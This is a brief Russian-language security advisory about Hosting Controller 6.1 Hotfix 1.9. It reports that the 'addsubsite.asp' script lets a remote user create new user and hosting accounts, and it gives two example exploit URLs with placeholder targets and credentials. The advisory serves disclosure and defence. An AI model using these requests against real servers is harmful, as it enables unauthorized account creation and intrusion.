Программа: Hosting Controller 6.1 Hotfix 1.9

Уязвимость позволяет удаленному
пользователю создать нового пользователя и
новую учетную запись хоста. Уязвимость
существует в сценарии ‘admin/hosting/addsubsite.asp’.
Удаленный пользователь может послать
специально сформированные данные и создать
нового пользователя и новую учетную запись
хоста.

Пример:

http://[target]/admin/hosting/addsubsite.asp?loginname= Mouse&password
=123456

http://[target]:8077/hosting/addsubsite.asp?loginname= Mouse&password=123456

Оставить мнение